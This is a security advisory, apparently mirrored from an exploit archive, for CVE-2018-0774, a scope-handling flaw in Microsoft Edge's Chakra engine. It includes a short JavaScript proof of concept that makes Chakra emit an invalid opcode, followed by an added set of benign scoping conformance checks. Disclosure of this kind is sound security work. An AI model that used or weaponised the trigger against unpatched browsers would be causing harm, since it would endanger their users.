Microsoft Edge Chakra Incorrect Scope Handling

Microsoft Edge Chakra suffers from an incorrect scope handling vulnerability.


MD5 | f9aa042a0c635706708db62651d0068a

Microsoft Edge: Chakra: Incorrect scope handling 

CVE-2018-0774


PoC:

    (function func(arg = function () {
        print(func); // SetHasOwnLocalInClosure should be called for the param scope in the PostVisitFunction function.
    }()) {
        print(func);
        function func() {

        }
    })();

Chakra fails to distinguish whether the function is referenced in the param scope and ends up emitting an invalid opcode.
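For reference, the checks below spell out the ECMAScript scoping an engine is expected to implement for the PoC's pattern: `func` in the param scope is the named function expression, `func` in the body is the inner declaration. This is an added example, not part of the original report or of Chakra's test suite; all probe names are made up, and the third probe goes beyond the PoC to the general param/body scope split.

```javascript
// Added illustration; every name below is hypothetical, not Chakra code.

// 1. The PoC's shape: a default-parameter expression reads `func`
//    while the body declares its own `func`.
function probeImmediate() {
  const seen = {};
  const outer = function func(arg = function () { seen.param = func; }()) {
    seen.body = func;
    function func() { return "inner"; }
  };
  outer();
  return seen.param === outer && seen.body !== outer && seen.body() === "inner";
}

// 2. Same reference, but captured in the param scope and only called
//    after the body's declaration has been instantiated.
function probeCaptured() {
  const outer = function func(get = () => func) {
    function func() { return "inner"; }
    return [get(), func];
  };
  const [fromParam, fromBody] = outer();
  return fromParam === outer && fromBody() === "inner";
}

// 3. Beyond the PoC: a body `var` named like a parameter is a separate
//    binding that starts with the parameter's value.
function probeVarCopy() {
  function f(x = 1, get = () => x) {
    var x;
    const initial = x;
    x = 2;
    return [initial, get(), x];
  }
  return f().join(",") === "1,1,2";
}

// Returns the names of the probes whose result deviates from the spec.
function checkParamScopeSemantics() {
  const probes = { probeImmediate, probeCaptured, probeVarCopy };
  return Object.keys(probes).filter((name) => {
    try { return probes[name]() !== true; } catch (e) { return true; }
  });
}

console.log("deviating probes: " + JSON.stringify(checkParamScopeSemantics()));
```

An empty list means the engine keeps the param scope and the body scope apart as specified; a thrown error inside a probe is counted as a deviation.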


This bug is subject to a 90 day disclosure deadline. After 90 days elapse
or a patch has been made broadly available, the bug report will become
visible to the public.




Found by: lokihardt

